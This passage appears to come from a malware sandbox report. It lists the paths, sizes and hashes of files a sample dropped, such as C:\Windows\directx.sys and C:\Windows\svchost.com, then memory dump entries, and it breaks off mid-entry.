8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
6KB

MD5
7706430df5005e005ea466b798868794

SHA1
327d53562da437233ff51670bfb4b225b8be23b7

SHA256
d3e1aa9127a140c3d6a964c14849a5314bd80624bf9720d877a8b7b76988e7c6

SHA512
a106bc378bde088229bfbe478172829b5b7e3417905a1eeaf71d4b9ee077403640f8f964dc492417df16f1a11cebe7d3c877d3015b28486c07c701f7ac35a32c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
6KB

MD5
fb16769d035838875fab9f9c307c9530

SHA1
c32cb0c7e11d14f0f8ef477cf57f70b823fe541f

SHA256
c636bd12ea3d461217d37cb9f39b6c6a1212e25824e8f6806bb1b07200d1cf64

SHA512
65f29d55f91406c5343c54e4b6721bde63aa97cb7ad0f8e04f030433e7f375d1615fa928c13c860e0615c3df86fc0f61b7344e0278c726cb49f1f3a813e5eec2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
6KB

MD5
78bcdcc8f46de4c220a19dfb1d70a10e

SHA1
2fc7490e830453cbd0d8d8c2f6e198f5b37f232c

SHA256
e2c069170d69fe1d91a897bbba99f1d52657affd4c758b53ff6612c7547671a6

SHA512
f1652e8f6ab5dc4cff052cbf27089f912ce6ea67bd9b7ba300b76aa90981a7750e91a795cafc474b31f6d039659e123815c349bd6a87f0a93850cb81d5daadfc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
6KB

MD5
a73cb70c72ac08c60d509fec873451b1

SHA1
14dbc1b9b0e5f13c1078efb8bc058c86e0013223

SHA256
20bcfa3afa3220fbe185715beb733efb3f19ff86caf0cf5954fc13e3b0ce1c48

SHA512
21ebae2125f0eedd43d2df7eb71cd527137aaff777c1562af90eb7c387d9991defb8875f291340b3fa2282c7085ca0dd136bd410b569249402eaf1a19a65235a

Download Submit
C:\Users\Admin\AppData\Roaming\Temp\Task.bat
Filesize
128B

MD5
11bb3db51f701d4e42d3287f71a6a43e

SHA1
63a4ee82223be6a62d04bdfe40ef8ba91ae49a86

SHA256
6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331

SHA512
907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

Download Submit
C:\Windows\SysWOW64\setting.ini
Filesize
142KB

MD5
f32b6e8d038d705525f2852939785f3b

SHA1
f140ecdee41981859dc7df84ff3283b6c5fd1109

SHA256
9f1651c6c86aae7b91045d4a8ae0106c65a472206575d5c194e94130e3193e4b

SHA512
d2877da9c6e182fd13c67d7df28662d9fcd4272300e5b8f326b10440c333c05af7a740938be76a99f47e573951a7a85e867d3c8c796d207cb671e36be3d10c08

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
40f4cd6a1e5c0cdfb1a6153ab6283325

SHA1
20c340f70c57974ff663cb251d0a9ae72446e5c3

SHA256
33b39bf301cd578b0e6a8964ff6ac041ba3fe3cc8ead2d621347e4434641046e

SHA512
3d9616b0fd704d1a7f95a45162bad7383b6da9c8155c52c10b9fb2f99282c626ffbe4a18ed8036de71fb19bf84c08471c98dbc903feff38aa17a4314352b0253

Download Submit
C:\Windows\directx.sys
Filesize
98B

MD5
9ca3bb4e2adaedb2964290e4e7bf1655

SHA1
7a57010a6db3e45459197c1af418e67e2532c17a

SHA256
7e8ae1dd4a5da07825e7f357ccf5d4bcf2ceea5877668e09302311af6272954a

SHA512
8224c4bbff77215f9d9fe631d9a706b5238a9f5b9e8636a1ee87ca2ca38156ff00793873c785b359eb62d5218f5686aa6bb480f300fb84f56d76b3aa2cfb2f70

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
99c85b4e0cb3ab0b41288c43c38c938c

SHA1
504a6b02dfef9bc29e77b9f8e778ed0eb2c3396c

SHA256
533304430675addabb622c9dec464b69a5595f37d403b5c9a307611b17818999

SHA512
bd6d8626317f2108c5a8933dc319dbc2490de6e57c1d79d37b4c55f59c4228dedaedc517294e6d29fa54ee90fc1f74c7b39ce3ca6a0ec1c498364c3e4f42855e

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
423f78183b6947fcd2037b748189a025

SHA1
9a46f2979be5e750592079bd137c378deb939928

SHA256
ba4622c0739fa320e6aff00a6ffd7e143bed2098f8fd1a660e4ce2f59cfba58d

SHA512
0bed61fe9f21d24ad1dcf817a83ca4f17fc1a577d15e0e11d96f05c5870eb329287694138721d96e1539ed5ae0554f1d50759b50e97837ef4a41239c1c35de40

Download Submit
C:\Windows\directx.sys
Filesize
97B

MD5
693c880d550c9c9226ee7e44150c68a8

SHA1
b0996d0f6aafb7bf613afb8614b67f80fccc91ab

SHA256
03f1ee1ede0eec24c552d11050c44c47e4863acfe974e9f757f572a9d56e40bd

SHA512
3291cac44495e8df48d35f7e2b3c99fc550f6f63d50782ab3d035f543cc3abd6556c06c7d5c87ff18a06f8c0c8ef5c149d5888f0156a1cf2ed7e51302c1cd98b

Download Submit
C:\Windows\directx.sys
Filesize
54B

MD5
0144b58c9b9e22efc34a5bdde8c1abc7

SHA1
4c16c3b3872802e156448131280f8e1edafd4343

SHA256
3ef4c308663d165ffdf8e85c775e53c8a420494f6e119e97b62d176c0069f263

SHA512
eb29b99b427f249c6424c1abd065475fecf06c2a762e49780b5c9071fa4049c8b532464de4a10e3c4c8a10706180f58373df9cd176b4c199000e5b99c7e4e457

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
85235579f908d6b5e62df06dd1312120

SHA1
8c3d8ea8e44cd3eb93eae8bcd4379fa146473efe

SHA256
4a3f86dba3f9954ec8211e556b9e8a2d2c2b6d983f430cf4c2cf83580c1872c6

SHA512
42a99b5cb26471828c825383442339741d907d597a7d1ab1cef357780dd4d4a051baa26c665f53738c710945a04ce192cb8e2a2404c4bc7e052215df4c8bf532

Download Submit
C:\Windows\directx.sys
Filesize
48B

MD5
e567790b149267e4f2edbdd18a8b8698

SHA1
7ce3178e1a8c76c7d1d0d64341a2117688d15c8e

SHA256
eeb939fc43bfa62b8c4b8b45802a0437fffdfdcf66022514a8e032df707aadd3

SHA512
83b6e7305474f531ef75e9a40af97093b171264851402dd469352221a57844bf035e186952011d078f98114ac82ae78f60d5a0d89e353a6c833ab5d22f4722a9

Download Submit
C:\Windows\directx.sys
Filesize
48B

MD5
467c2d552b3476f73542be0994b7c023

SHA1
c5670f5b153f36f6ce84cf5d1a6a983e3af53255

SHA256
e92e209517cd5f9f1f8825e9948c4149b580c36dfb9ecff7ee906f65804a27c9

SHA512
98b4164d30f436c54e83a78e536e2b3da321e2ed55368dd42af69f429aed710cd742ed32db561afb0cb993e21011be061408605836d587b30980acd2ca0bd7ab

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
037e05897aa8c92a8c085078ed1d5263

SHA1
5511be4c3ef1bfae73c3f594c10bcdaf8bf34b5d

SHA256
97dd18a071fe1ccae8f305d17a59afdd261735b6b205f45cfb2a84ba6027426c

SHA512
2cb30f6ee67265c61de1b7fb599792c2d84477fbe034c28a460e38dd87c30835fc923281441a35c80de92ef28e7b6c41c1d6a54c3b45b2288db64ecade431092

Download Submit
C:\Windows\directx.sys
Filesize
99B

MD5
2a18d94c0268a67e551bd1a6a8c3b4fa

SHA1
62c162f400941024b9cdc4da585844074bc08240

SHA256
935b4b7419bccd1f3a3e76691a85894e194c075d82c5a8afd921b9fdd6a0c066

SHA512
763dd34e75be9b717dbba19fe26395fb32c5aa1b9695745883aeb4a273ab4a64515c96f23b3c614bdf92a74ba9918414fd0c92db0f7324f05abf340201ed6ec5

Download Submit
C:\Windows\directx.sys
Filesize
44B

MD5
4530ea9d39dbc63e467af34b38deca26

SHA1
c0ba0ac54080491848a4d608cbb5a7d211f065ce

SHA256
5376ba9bae9f633b25d02653e6fdb698e0059dac7fcb6592a32ada490edb37e9

SHA512
4ace7ba77be3f39c9756719f4017c31d736358e74ff699e52489c6b89dc1f1290e51363b8748b3d274dc205f2a4c7bd61d32b8a43ac0f5487e7c167cb2862aaa

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
ba53f9a78c91fe606d57af320584fd95

SHA1
9adb07abe99e574eff6e964d0b46eaaa1ec79827

SHA256
fc88eb1e3a27e87528e61a16c6a8f07bc8f03ea23e262e5ad341775fca892098

SHA512
cf0c5588dde7aa7220c150c6f39a36942d9ab0aa4fcf0e55fdff315d21850998c6bf1d2d0faf980e79b08bcf3924e22f12137f801e1039e479d73b4d429a6b90

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
b4f982c9f2ae2685b34890683eb9133f

SHA1
a71f9ecb98b2ee97f239f48acbc0dc17bf52f259

SHA256
0728c75fad71ab1a15cdffdf1ce1fae07ef7bd87c018adb0d0225522a660bb18

SHA512
b310f5bfdb31ce8d9f8f1cb54bc2cf982e03395b9e3796a21971e688cc7f975627a378786860f8c0267a3575e2afb54e2baaebd28bc318d728011f4cbd03cc83

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
772073fca21a13921bd623f80fe27de3

SHA1
12e6fcbf90185bb02f55302d431eb3a8bba9a753

SHA256
7d034efd0931fbc0b4b3d5fa3119be391ce2c254dfc778a16e6d833f8c1b8bae

SHA512
27418880d62dcddbbd13b3a8ed376150cfbdfe2cd850a32ba009d71d719fde5cdb057fae708f4b2ebda8abdd9b4e4f01217e9bcfb3fb16607b3ba86a2f833a3c

Download Submit
C:\Windows\directx.sys
Filesize
99B

MD5
d9bc15147dd47efe37aa51073d5be0de

SHA1
400a94fe09125272070cf0d03923fe6a3f60cd1c

SHA256
cee05f380f375a623fbffae216d69b40b5215472fd01744f91c6ae2d36b16974

SHA512
e4b8f583a78321b32f045232100541b5dd983fdfaa8008c76963a2a0ae7d8c5b6e89be5cd0fd0695e9340b8687ad4dc342eb0050b02288e483de5d93f9bfa7d6

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
68e224ca8ae43097d3d2bb5c47320b36

SHA1
336858e493c9c4cb458be50334d240a805b516ba

SHA256
fdac9fb0258c1c45b7c13e6509234f8aa7aee28a06a6b12a5f8e08ce8b104c47

SHA512
c7ad0d120b80468ecafeb64a27076c7008ea7f130957aee449b06c1526ef6264d2f42558f73c7e1835cb21c7efc6fadf216272f56eef5080327a7972ea1d056d

Download Submit
C:\Windows\directx.sys
Filesize
95B

MD5
f81bb49da6bc4b0497cfdcd81c406122

SHA1
183a82c76a6a9c0796d09c6c8f4a55a20b353e16

SHA256
f7bda37ead9fe8a48a19fca50d289bb7930f27d3bdef4b38a1d944ed1b14f465

SHA512
2140f789e48147c2e4f5f56a5d3c965809e412e2b27568d23c47550999626900b2a71ab7cffb573ee15f7d2c65e6b7562d64b6c7865f310497bf2ac9248adb2a

Download Submit
C:\Windows\directx.sys
Filesize
100B

MD5
3596183d3613babf34ccb8f084a88a47

SHA1
372a0c01c907ae8b9cb3de1ecf51fa91a6e24e82

SHA256
c7df33a46d768611aa7acea9b9ea0aa27ac127827cd98f3797ec5ba29505abcc

SHA512
fe31543b1b98168d44c56e518d73f7e68eb23430d7c373800d196e2debbdcaa3233c32caad72decc458599224f81f8467e667cedf3887bf529c2274f9566872a

Download Submit
C:\Windows\directx.sys
Filesize
100B

MD5
41da9a4473c0bd2314c167cd55afae60

SHA1
75406889a0be44b42e8043813b95e8677711bcc4

SHA256
64fea945a7b053f378c4f6062e8d27e8ce6d7dfb980ad6c5e046c93430048361

SHA512
dc90e2a3e8423b2dc91f823e03795f2e7f15a9cc40afbfedca511e3d8e561e2c4feea9a8628e37786cd8bb801a624df0f77f2da2297aeb19921421a07d7e821e

Download Submit
C:\Windows\directx.sys
Filesize
98B

MD5
abbdd760d47a8289c19ba458d09d27bc

SHA1
feb649455287ca9165f943168834deadec124d72

SHA256
e511c613158caf7ec001012c25c3db10365e8a4a4e4c57dae7238d057d2fc8b4

SHA512
259c09cf9de0c87e5c9765fc89da9130659de5245a92f7a2a73f13f2a8161865c40c9827f89748e67b3606c5661a46807f3ce9f0f686e35d24b4e0a8faedaf53

Download Submit
C:\Windows\directx.sys
Filesize
101B

MD5
f4b93fabc63dbce8ad72be913bb7ea3f

SHA1
a0da24be7912c79e37e3f3063cac4742e2307852

SHA256
4a1b9f9d9938ff367c01bbb4ed4a0d229b280c52bf000bd1994104071a81127c

SHA512
34bf8e4469c0fb1d79013d87479587bd4a919462d54c9a27d2ba412e3760325e41e1f1d3ab60d189cc61575dd2ca19095cbb11f63b7eede3d826971617298393

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
51563690daf6893160eff0725efd8724

SHA1
d01952e9425f693358c416c85668ae84fde29148

SHA256
e701319a7f370d5365c574e379f433aacf38fc689a4b90270780318e4b6688ad

SHA512
24cc7fe4cd5a13d97857de56420a1cb47593d1273a8a80e07a1c8b5aab4b765c04fa16fc9427399b190e0df70b87b591f4dc4ef4356f63a61b78425fb83864ee

Download Submit
C:\Windows\directx.sys
Filesize
101B

MD5
0a123879e893dd2a3dbf1ada86dccb8b

SHA1
ad013c402ab8ab02c952f56351f262d03b2cff4f

SHA256
03b9b8f914b930801a0f0f529a4f6659d7ed1bbed187b92b8b380e714a548a28

SHA512
4c9c59782a2f87e0313c1dd68134eb2700ff7e155d18442779dd0ea2fb8f62535d4c4a405a68e58f040025a4c0d148cb09e8e2201f0f66dfc80cbcac32aa6b3b

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
e0f8f780249fc5b2ef7dddbacdef2ae1

SHA1
cdd09fff35822076fba77a8bcfe3a35527480c94

SHA256
a355f59423f03e3809befa6e609641ed7a9d269fcb6d3ba5ce0853b1ca4a9e37

SHA512
1974d8f5fe39c1478e03c716fb83facd4a06f6a62f165e7aedd3d881f88291632eb63544bc3d43ceb7857d9cfca37bb6ca1f908db49f67028e5d0d22284b9516

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
bc078ad203b8793c23ec9fee7790f12a

SHA1
53e2826403f4935c40936f5d28f83f2ed90fe638

SHA256
85fe6498a7ac5cbb7d37cc5f1ea22c34e05385c8be4cc2224204379a850dd052

SHA512
9e01bffa5fb42288bb6acc48abe0c7dd5aefff4a80d0bf89f12baa456e4c1a0b08804f6c69a94014acd43d074b53a13233f070e300cd23429445aab071d62c59

Download Submit
C:\Windows\directx.sys
Filesize
96B

MD5
c293e9b65137f1aa3496de96b4a4d191

SHA1
06c7bdb906bdd64ff68c5e9c072775dd0df98d79

SHA256
1e036f3f6cd2885c9fcc25da0ed93cde1ee19eb33423370979ea248ea16398b6

SHA512
355a795a1e4c123b75438f82fbde612ea8ab1345d54753fd2d3dfb61cdcebddfd67800bc2681d4286684c2d92f79b9de448478118fa680e3e183b561d6899399

Download Submit
C:\Windows\directx.sys
Filesize
48B

MD5
3fcfa4beb400f4fba10e712e334cefbd

SHA1
a33fed94c499838d39097a8d0617bebf082c85e6

SHA256
b46dc1c8aceb90551f5c1175d6e465080de215f2838c86efe0f46c4b47d99e1a

SHA512
ff1b2e3dec419e918872ea051a2b6f93d7b99dcbd72029e8da417b07c0f59b5c7449f6c4df3b77bdc0bcbfdeb0e9902e195114c06ed760ec3127d77dbc0bed6d

Download Submit
C:\Windows\directx.sys
Filesize
103B

MD5
41f3b4ca8025c6c805a1dbd2a2742cf2

SHA1
53ad31963c8e0e9911d7d0264acf6d028c701b0f

SHA256
cd2fc85185687f90850e4f877dde10ea87eb8a2da8541f450b097c448a1febcc

SHA512
c3fe2fbe1da644157d8bf9c17adf99dba9b64bf67b1892c2919f7914dd1ac9fb680b9c4fe9110f3951ba3dd510dd6ff640144d9c27b23f79ede12509b84f31ad

Download Submit
C:\Windows\directx.sys
Filesize
100B

MD5
9294d26075fc4b6435e72f83bab844d1

SHA1
b60e2949d4a3f5c68927f10e840c02623f33e813

SHA256
b60fea79e446a3566a9ec654ee4a28d0725b75ba6e9c5c5403f93dcfca9532a7

SHA512
9d3c65f14f5c48239c65db72f2bfea77154ce9cacf1e5749603560d47d3c98682336f4b17192b0d80bf3ad5f510896624bca3f579a26ece0712af2e15ea6f985

Download Submit
C:\Windows\directx.sys
Filesize
98B

MD5
ecfaa1d4c7b7617a621f681ee00254b2

SHA1
20009c24413b85b2c5215abef19781c51c463844

SHA256
17e7eafb05a0cfae636a2a41d17eb2381fe26255c501c181ef7424dc7211cf9b

SHA512
403b868430a6ae98c7c04ec9be2f1cdcb584e684946cf5daf8ace7c63726a7896076b9bc2c4ed92b494679f86551d13d7f296abebd8c6ebdf06dc40782f11bd5

Download Submit
C:\Windows\directx.sys
Filesize
101B

MD5
57a5ffd2b2bf2d3e485b8eb9139e0a6c

SHA1
10fafa725fa4c321654d7b25a178b383d2a74d0a

SHA256
f051f67b62dd349b53d6d2400fbf3ed743e1c675eb43c4993b4067b247a40fa6

SHA512
99c909f907d850ebce366b9a0192e53d56d5f93180138772b6112af87cdd014fbd996780da840d6fa9c87358a3cad5d0f7cb6a6fc6251b208d86aa0c22fc2c92

Download Submit
C:\Windows\directx.sys
Filesize
131B

MD5
528ae04618cb1ca4ef90972f955a8b62

SHA1
c63beaf24af1850a8604479354099ae84fcb42fb

SHA256
6089483fe5de8aac512178a8bb383f4c91bf9b2cdcf37dbef27512442d6280ba

SHA512
1705273b5dce12bfad4ab1997e80ff5621923e7c7ce389b5eae91b0d64b043f27e5e98f31a127fad0b706cbf5b210f2669412b72cf10532a1acc6ab85b460242

Download Submit
C:\Windows\directx.sys
Filesize
47B

MD5
92a91d0f6f5977b75e6b8f3efdb72765

SHA1
9415e7333b42292f348a35fda35ed6c94a9dd6e8

SHA256
94bb017b41783656bcf91f9e02b542a1f02cb0781f1b6dd28226a814b59efaeb

SHA512
3fd17f8de990da86957c61f0c8b7de5c31d644c3c4b484519cd3fa70e7657160548c0d0c8a734fb0c20a5d183ef83593051883f6dcb68b0d7f8d8fe902dec7aa

Download Submit
C:\Windows\directx.sys
Filesize
54B

MD5
e006c9cc79628dcbb59929f0674c3085

SHA1
83abb3b1937b22dfcb8eff1faf8264b9bd9b5c3a

SHA256
c4c5f5d4f92d3c641629cf172b32ef9050adeba673165db6d4058587b04bf51b

SHA512
a77dd704412ebbf9621d5ac0e832710afd28759bba60a2e3c6d8a3e409e4c97944b82b2ee840e4d9aa0f1144fc9818b79c9795c9dd653cbf8d1adf5b9b39c842

Download Submit
C:\Windows\directx.sys
Filesize
54B

MD5
059fd5d57d7b335b25ac5847d6f37c57

SHA1
4a7b665c184006d8cf5d160c448bf92dce1322be

SHA256
ff28a01b321d9b14b8705fd05341c016034e5d48bf510d014be3bbbfbe75f290

SHA512
d2ec06b99539c59505f13f2229d39c80750e089e1479f945fc55a5fd882e28b64eb33d5b2705ba11f8fbaed679195ac8456dfa17a37128880d5acb4e90dcf3f7

Download Submit
C:\Windows\directx.sys
Filesize
47B

MD5
07cfd9ea33a386df3e8f2f83dba18d6b

SHA1
1fb0127036a3e1d5d83a83e9e88d9a8c18257dcc

SHA256
d3ba616ffeeb9dfa4731ecbd150075f1cbb4d5112818380f6e3a0f6271ece024

SHA512
c375f5d54ddde80055ad378454921cdc65db5f622c3ac091291c4f5bdb1a4c23b569426c3da2fa36c9659c9fabeeb5675b94a76548c927339d029ff086ffb85d

Download Submit
C:\Windows\directx.sys
Filesize
54B

MD5
0b61d58433efb591c1be7bb2deee8703

SHA1
4d65fda3de924eca0de5b96dd2fe57018fe0243f

SHA256
194babcfa36a6814e0d5bab98f1e16e7fb0eca2f2663f9569b25bf7262426bb5

SHA512
efa07e39c6e75524a9cdde66abfc5ff55b265f8bd6c0b947130857be0df36177bda0485ef1609fbd3defc267e54f9ea033a1a27b0e768df5d59dcc36d390261f

Download Submit
C:\Windows\directx.sys
Filesize
51B

MD5
3f6da78e356633ba6f8acc4a09fd9527

SHA1
407257bcfeb33c069de3628024c8e04687de48df

SHA256
83ba0112fb5874a7d9d677e8575d0dde3bd3969139f125550394a3f04f6ebc49

SHA512
d1f70f7ae6f4bfdb39f64da356770daca17172c5d72b622d59ef9695706b67431daa68f3d7e0c6d6cf04da6d11f8bae9abf1bfa907870bb5a63e70a3c0090c21

Download Submit
C:\Windows\directx.sys
Filesize
54B

MD5
91397e8058ad79bf5da56a6e7c690318

SHA1
1bef9169a11b89e593c5f4338a9b5e0987f9e2d9

SHA256
f2d24959c57aa9291b6686b894b4b0d4c13e061942b4cb1c82f07178b908f37f

SHA512
498046c7c519a2dba1f591ecb7a91cb631815188c04d05218439b71768596f6814244561e435de96dc56e1ffc86a87e6b33e8c0647ad631472314a3be80035e9

Download Submit
C:\Windows\directx.sys
Filesize
50B

MD5
7fd08ad52a4900884e4a0993696a4786

SHA1
2a87e0c0a6e12ab657ef92cfd451fdb383457bc3

SHA256
9d76a0c2667a58cc1c530509cfbefb46e8671a1feb23e3d5b6b3e5ca46a79385

SHA512
3e60e21cfab225533b627d16dea3ced629df6c0a0a41f2de8052c02ec48077757cf16701b62399ed9a241555f6440c150aaac0dc1878634b9efa7b5557c9f765

Download Submit
C:\Windows\directx.sys
Filesize
54B

MD5
82cb80d2892f9ddadaf34c9f4ff66e49

SHA1
bb70171f23c9246e1052e767125b6c1ac95dbd5d

SHA256
03cc5a2460a04180db2609a386c12da88d20e12a653b9b8a58925a8347af20d0

SHA512
a74721422b36d58b64f89db154d69164a38c9424601597354aaaa99d9e7dbbafcc23251ee0b41cc1a6e1209cf483ac5ecea873a749caa181c93d559916b08f70

Download Submit
C:\Windows\directx.sys
Filesize
107B

MD5
a5bd0bcb70e998cc5d9b75f05228139d

SHA1
1ddacb89da736cf0ac9adca40406df4603139cd5

SHA256
4d1dd1ba583bdd1f1c600ee1709851c6d3dcfa67c5cf29ad834f36fc28119349

SHA512
37e9f2d65ad274690bfbb8963db96df8d219ca8ba6c0b2f77e8159bd0a672aa0afe39b71b7b46c3e0e452e102b629340dc1516016903a93492b8f712174f360d

Download Submit
C:\Windows\directx.sys
Filesize
135B

MD5
f09058e409f14134a8078ef0ba7a26f2

SHA1
b9fe2b7936fa098a85940c4d37c4bc4218ac827c

SHA256
a85ae7edef5e07d1239624e13aea13b6c3f7bef9982173a0226cbde56b66bd66

SHA512
80bf6413eb1958cb7442d52209e566e1aa4b2d1c92225671d6d05975b65ed58e950932da7b5a2ddd9d2d7499accb1ab0ac885ecc37b3288e0f3e2c694003477b

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
e84367bb90fd415b59e3b3e2c459563d

SHA1
fc784ec280a41e492e763d65a551b22d78471bb4

SHA256
a412097dd00ae342c9ff5df4f4427f079ab7c55281071cb28020224f51f40629

SHA512
63a118d421e99ee07e52dddb66967977d95da2e396833130cc5b46123327ce10d03c7308984ed05e09a7ebac19951588619fda2a0551929d5d833b3f840179d9

Download Submit
C:\Windows\directx.sys
Filesize
100B

MD5
4d84514595583294439353f888248393

SHA1
f8b2aef8164aff8dff1eefc9dd713b357bdbadc8

SHA256
3eb42bc1eb6a9052a4f9e0dc53dea44a3b1735d8d21ffedb6a2cad85e55322e8

SHA512
2768b51bde32064fcbea4270997ddb3581a4a71e85c0a9d959dafc56072cbd35a185c1354efd2960babe4344f47f18a955336ff74e236daac2a7ac270d911015

Download Submit
C:\Windows\directx.sys
Filesize
77B

MD5
463753a3c186c31383c5ae7691bb3e1b

SHA1
7a7c65408b54f0ad24173cabef11d62e14aadb30

SHA256
7efe2f65d2211075c76cb7d751deeaa66fa542f298bef7fd2b9c0ab82a5cb7e1

SHA512
891d275a838f2111be564fa3b545d0c86c738d88155c20522119ba062b0985067aa6a3232b0e092f2591e0762116a249f240f0649a4e9a4862ff244a5636558e

Download Submit
C:\Windows\directx.sys
Filesize
95B

MD5
4302699c3c0756f6f2932ea73bdab53a

SHA1
f608ff362cd5eecd7313d84b5e3a826f73fa89fc

SHA256
5f7e615b7488ae6be872423234fd3f628b4b7303d840cb09eae1a7a7399ce0de

SHA512
4bacc984b54a7b300041dc0f9166b7d945407c72e65698202feefc4fff50bdf99a16a3e68a0f328d3317b979bc014c997c51ce89504ee23ee6f7753f611af0c9

Download Submit
C:\Windows\directx.sys
Filesize
95B

MD5
54cbefb7e046e5095e3328f40d8261a1

SHA1
942855c8d3fa4cbb2643e1d1541d184e2a2e33ac

SHA256
73b6a5ffd84abc7743c4022f6fa0d4372434e190a7566f986b329411e99d9b44

SHA512
dab0bcb13a860459dbae65100d7cdae4637228e4d67688c68c3e9dedac62c55251c256cc921e3b904fc8cea1201005eca0f7315f5b7cbb5c3ef2c522826be6da

Download Submit
C:\Windows\directx.sys
Filesize
53B

MD5
2f77fee058ec5a8be4abafe6d07bf766

SHA1
99b7d0c7d587362f6c68706d66270e8ed237a47f

SHA256
4b53ad05bb3a81974c5b50cc3c9c033541088fdec08667eb548c36338f12d916

SHA512
d1546d7dc47894f55315d5d732b315cb99ed234f2bcdaab25ff732d43ff7406a24bd1757f0ece16e8f5efb5711050546899e7f16d7fe769b32b0ed94b080a28c

Download Submit
C:\Windows\directx.sys
Filesize
99B

MD5
c57acc9892c38a7e721329119ceff1e6

SHA1
0472923e2a7583fc1bf2a92c9e67891238763232

SHA256
8ca7837f7a3b83ef8c22d4594151e76641b852046d71af134dd722e158996e58

SHA512
895ce8d9f802ed9e4bf0a1c52662698b05fa31be70bf30ac2515a57a405dd53ab236411bb0e8d7e1d3075a35d77a264cf235109424dcfe0cd3d057d114065feb

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
729a830aad13133f6abeb4a9314f16b4

SHA1
c27814f37de1aaf5079088fb53ada7980d7aaf57

SHA256
9b3b468001a5a965e7c5a9b5b175380039b15bff4bc243cf15161322bc2818a3

SHA512
3ef1c493831e3bb00c5567a5ecb6995499e5a2bcd9b0b35a252473ad352cef7452887d517914f12fc71b155a8615606be0d647944e693ae13995377508382e6d

Download Submit
C:\Windows\directx.sys
Filesize
107B

MD5
312d46a448095b3c6cf470ebfc1095ac

SHA1
31d479925cf7a04ed70a1649eb7d9252b9cfa4d9

SHA256
f83b4512f6dc89a53cf8c7850beacc6092fc760146c9292a180df421c1fbefba

SHA512
7b1393bed1d0efacb86090f66fb250fd4f2750b440eae60b7c9b65af08e668c85404963d84ca3d6844b634a74f034ce073778c3baa43574d073c83f21fd28b91

Download Submit
C:\Windows\directx.sys
Filesize
82B

MD5
34fc4348ad5b34d7d50d5237a0ec7e7c

SHA1
54c4e6a22d129d14ce746fde1cebeff78067e19f

SHA256
73e3ae90978387351a01b4c7bb1e31f36be615beeb8c460f4b96a23d89a528e3

SHA512
49187e3c9f6e637a6b09deaeb98105d696a821f451017734e7434e291f5e0f9aab10fd8902790e7d3b8fded24197da26e439d58e1ed8d4447a7a6b77a0c1cb91

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
9f3dd22c45d3e2527c2ba9fa983defdc

SHA1
f152065be03181efa7ab5cf1e2a046a7929446a6

SHA256
86d8bb9b1a31e2aa259c8ac350ff8e306c9428c3397444eb33907ede94d3a3f6

SHA512
e61067d48fe80f730989a7446dbc4ee79761900d65f51bfb1d4cdbc96523ca4bef0d65615d748cf997a1ee3c1a447d5856a2323c93b959c2fe08139e88a2f8cc

Download Submit
C:\Windows\directx.sys
Filesize
97B

MD5
f5d1576c08ac0b3ab046a54c44669b32

SHA1
aee44e43642d09d3e1f73da22306bd04132980fb

SHA256
098134dfd56fb5f84f9756f81ce3b3a19e0876f0277bdaae396d7a171f24d69c

SHA512
a47e8ae20fff112e05a1b02b0572870817509fceb0e236caf140edbca7dc029703d944eb99dcf0572aaabd66421afe6fc045133a7d13d8f0d2e24acce8f1050f

Download Submit
C:\Windows\directx.sys
Filesize
102B

MD5
faa27caaf6ba09d62e7999d194792446

SHA1
15d55add425df4212abfc932a1b7f98c58622dca

SHA256
bf6c31929b9ed2e444bd03ab978af1b8bf5bf418714c155d3ba8f7acad4f2fad

SHA512
2bab768efdfd6fff879166e474cb3d751a97498cad89f929ecb8006e97a1f03fd7f5af33ba6bc067cde6cc42ebce6381e65013e0f5b262b57594731bef83421b

Download Submit
C:\Windows\svchost.com
Filesize
40KB

MD5
ae27c72ea5f40c58ac8b6a5c6fdb0e4e

SHA1
ceae01e9d743fa590c24daf19fecc80f2059c43d

SHA256
75fe6a69c414308cc0b99bd3fe4a1ad161c59e7b592d30a9cec8e1f1fc251364

SHA512
883f4f95ff1fa33853d07c6bd82fd597a6d27beab6c94d57c735ba3d4b99ce430bdc7d49d79bbe22593d2dd54185f543dfad8ac69aa490a87a3b20eb28d4e2ff

Download Submit
C:\odt\OFFICE~1.EXE
Filesize
5.1MB

MD5
02c3d242fe142b0eabec69211b34bc55

SHA1
ea0a4a6d6078b362f7b3a4ad1505ce49957dc16e

SHA256
2a1ed24be7e3859b46ec3ebc316789ead5f12055853f86a9656e04b4bb771842

SHA512
0efb08492eaaa2e923beddc21566e98fbbef3a102f9415ff310ec616f5c84fd2ba3a7025b05e01c0bdf37e5e2f64dfd845f9254a376144cc7d827e7577dbb099

Download Submit
memory/360-398-0x0000000004F70000-0x0000000005173000-memory.dmp

Filesize
2.0MB

Download
memory/360-356-0x0000000004F70000-0x0000000005173000-memory.dmp

Filesize
2.0MB

Download
memory/360-339-0x0000000004F70000-0x0000000005173000-memory.dmp

Filesize
2.0MB

Download
memory/360-387-0x0000000004F70000-0x0000000005173000-memory.dmp

Filesize
